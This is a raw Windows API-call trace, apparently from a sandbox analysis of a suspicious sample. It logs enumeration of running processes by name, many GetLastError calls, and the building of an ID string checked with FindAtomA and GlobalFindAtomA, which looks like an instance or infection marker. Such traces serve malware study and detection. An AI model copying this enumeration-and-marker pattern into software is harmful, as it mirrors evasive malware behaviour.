	[0128.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.772] CloseHandle (hObject=0x2dc) returned 1
	[0128.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.772] CloseHandle (hObject=0x2dc) returned 1
	[0128.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.773] CloseHandle (hObject=0x2dc) returned 1
	[0128.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.773] CloseHandle (hObject=0x2dc) returned 1
	[0128.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.774] CloseHandle (hObject=0x2dc) returned 1
	[0128.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.774] CloseHandle (hObject=0x2dc) returned 1
	[0128.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.775] CloseHandle (hObject=0x2dc) returned 1
	[0128.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.775] CloseHandle (hObject=0x2dc) returned 1
	[0128.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.775] CloseHandle (hObject=0x2dc) returned 1
	[0128.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.776] CloseHandle (hObject=0x2dc) returned 1
	[0128.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.776] CloseHandle (hObject=0x2dc) returned 1
	[0128.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.777] CloseHandle (hObject=0x2dc) returned 1
	[0128.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.777] CloseHandle (hObject=0x2dc) returned 1
	[0128.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.778] CloseHandle (hObject=0x2dc) returned 1
	[0128.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.778] CloseHandle (hObject=0x2dc) returned 1
	[0128.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.779] CloseHandle (hObject=0x2dc) returned 1
	[0128.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.779] CloseHandle (hObject=0x2dc) returned 1
	[0128.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.779] CloseHandle (hObject=0x2dc) returned 1
	[0128.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.780] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.781] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.781] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.781] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.782] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.783] GetLastError () returned 0x5
	[0128.784] GetLastError () returned 0x5
	[0128.784] GetLastError () returned 0x5
	[0128.784] GetLastError () returned 0x5
	[0128.784] GetLastError () returned 0x5
	[0128.784] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.784] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.784] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.784] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.784] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.784] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.785] CloseHandle (hObject=0x2dc) returned 1
	[0128.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.785] CloseHandle (hObject=0x2dc) returned 1
	[0128.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.786] CloseHandle (hObject=0x2dc) returned 1
	[0128.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.786] CloseHandle (hObject=0x2dc) returned 1
	[0128.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.786] CloseHandle (hObject=0x2dc) returned 1
	[0128.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.787] CloseHandle (hObject=0x2dc) returned 1
	[0128.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.825] CloseHandle (hObject=0x2dc) returned 1
	[0128.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.825] CloseHandle (hObject=0x2dc) returned 1
	[0128.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.825] CloseHandle (hObject=0x2dc) returned 1
	[0128.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.825] CloseHandle (hObject=0x2dc) returned 1
	[0128.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.826] CloseHandle (hObject=0x2dc) returned 1
	[0128.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.826] CloseHandle (hObject=0x2dc) returned 1
	[0128.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.826] CloseHandle (hObject=0x2dc) returned 1
	[0128.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.826] CloseHandle (hObject=0x2dc) returned 1
	[0128.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.827] CloseHandle (hObject=0x2dc) returned 1
	[0128.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.827] CloseHandle (hObject=0x2dc) returned 1
	[0128.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.827] CloseHandle (hObject=0x2dc) returned 1
	[0128.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.827] CloseHandle (hObject=0x2dc) returned 1
	[0128.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.827] CloseHandle (hObject=0x2dc) returned 1
	[0128.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.828] CloseHandle (hObject=0x2dc) returned 1
	[0128.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.828] CloseHandle (hObject=0x2dc) returned 1
	[0128.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.828] CloseHandle (hObject=0x2dc) returned 1
	[0128.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.828] CloseHandle (hObject=0x2dc) returned 1
	[0128.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.829] CloseHandle (hObject=0x2dc) returned 1
	[0128.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.829] CloseHandle (hObject=0x2dc) returned 1
	[0128.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.829] CloseHandle (hObject=0x2dc) returned 1
	[0128.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.829] CloseHandle (hObject=0x2dc) returned 1
	[0128.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.829] CloseHandle (hObject=0x2dc) returned 1
	[0128.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.830] CloseHandle (hObject=0x2dc) returned 1
	[0128.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.830] CloseHandle (hObject=0x2dc) returned 1
	[0128.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.830] CloseHandle (hObject=0x2dc) returned 1
	[0128.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.830] CloseHandle (hObject=0x2dc) returned 1
	[0128.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.830] CloseHandle (hObject=0x2dc) returned 1
	[0128.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.831] CloseHandle (hObject=0x2dc) returned 1
	[0128.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.831] CloseHandle (hObject=0x2dc) returned 1
	[0128.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.831] CloseHandle (hObject=0x2dc) returned 1
	[0128.832] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.832] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.832] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.832] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.832] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.833] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.833] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.833] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.833] CloseHandle (hObject=0x2dc) returned 1
	[0128.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.833] CloseHandle (hObject=0x2dc) returned 1
	[0128.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.833] CloseHandle (hObject=0x2dc) returned 1
	[0128.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.834] CloseHandle (hObject=0x2dc) returned 1
	[0128.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.834] CloseHandle (hObject=0x2dc) returned 1
	[0128.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.834] CloseHandle (hObject=0x2dc) returned 1
	[0128.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.867] CloseHandle (hObject=0x2dc) returned 1
	[0128.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.867] CloseHandle (hObject=0x2dc) returned 1
	[0128.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.867] CloseHandle (hObject=0x2dc) returned 1
	[0128.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.868] CloseHandle (hObject=0x2dc) returned 1
	[0128.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.868] CloseHandle (hObject=0x2dc) returned 1
	[0128.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.868] CloseHandle (hObject=0x2dc) returned 1
	[0128.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.868] CloseHandle (hObject=0x2dc) returned 1
	[0128.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.868] CloseHandle (hObject=0x2dc) returned 1
	[0128.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.869] CloseHandle (hObject=0x2dc) returned 1
	[0128.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
